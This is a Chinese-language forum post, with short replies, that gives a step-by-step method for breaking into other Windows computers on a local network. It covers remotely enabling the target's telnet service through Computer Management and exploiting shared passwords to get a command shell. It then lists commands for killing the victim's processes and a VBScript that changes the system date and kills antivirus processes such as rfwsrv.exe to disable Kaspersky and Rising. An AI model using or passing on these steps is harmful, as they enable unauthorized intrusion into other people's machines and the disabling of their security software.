windows局域网的一个经典的入侵方法
　　3年前我用的东西了，可能大家比较老了，不过也许现在还是能用上的，不过大家不妨试验一下很有趣的。
　　点我的电脑右键单机管理，然后点操作底下的=》连接到另外一个计算机。输入对方ip
　　或者你不知道对方ip 可以这样，点浏览高级里的立即查找，就可以显示本局域网工作组内的计算机了。然后双击你要进入的电脑，呵呵一般局域网的计算机密码是一样的，所以不需要NTLM验证，不过那个验证比较老了，现在不知道还有没有人会用，进入后然后点服务和应用，找到telnet服务，然后开启对方telnet服务，如果没有进入这些界面或者服务出错是因为对方没有开rpc服务，当然还是选择放弃吧， 如果按照刚才步骤成功，那恭喜你已经得到一个进入对方计算机的通道了。
　　然后在cmd底下输入 telnet 对方ip地址 就会显示对方的一个cmdshell了，当然这里有个小技巧，如果你不知道对方ip怎么办。很简单cmd下输入net view 可以查看到局域网计算机名，然后点鼠标右键 标记你要的计算机名字选中 按下回车就复制到cmd的剪切板里了， 然后用ping命令 ping 粘贴你刚才复制的内容（直接点右键就出来了） 然后就能看到你ping的ip了。
　　进入对方计算机该后该怎么做呢。 呵呵 很多黑客教程好像没有具体告诉我们下一步我们该怎么办吧 嘿嘿。
　　发挥你的想象，把对方电脑就当成你本机一样去对待，比如你想查看对方进程。
　　cmd 下输入 tasklist
　　进程太多看不完怎么办 tasklist | more
　　想杀掉他的进程怎么办？
　　taskkill /f /im 进程名字 /t 如关qq taskkill /f /im qq.exe /t
　　或者有的用ntsd杀进程
　　ntsd -c q -p PID
　　PID是用他是用tasklist就可以看到的对照相应的PID就能杀进程
　　如果多次查杀对方进程不成功是什么原因，很可能对方有杀毒软件或者防火墙
　　怎么去杀掉卡巴这些进程呢？
　　这里有一个脚本
　　Set ws = CreateObject（"Wscript.Shell"）
　　ws.run "cmd /c set date=%date% &&date 1988-1-1 &&ping -n 30 127.0.0.1&&date %date%",vbhide
　　for each ps in getobject（"winmgmts:\\.\root\cimv2:win32_proCESs"）.instances_
　　if ps.Name="rfwsrv.exe" then
　　ws.run "ntsd -c q -p ps.handle",0
　　我们可以这样去做 echo 加上面的每一行脚本代码>>c:\kill.vbs
　　最后在运行这个脚本 就可以了。 呵呵
　　也可以你觉得麻烦直接输入 date 然后加日期修改成1988年左右就行了 卡巴就失效了
　　瑞星的原理也是taskkill掉了rfwsrv.exe这个进程使杀毒软件失效。
　　其他的就不用我说了自己研究点dos命令就可以搞定了。

看的有点迷糊。。。。收藏研究

不行啊 头都疼了

怎么没人看你的啊

我来看看

看不明白呀!

...这个方法确实有老了  但是很经典.

我先收藏了啊!
谢谢LZ

没人看你的?
怎么可能这么好的东西
可是我网吧里用不了!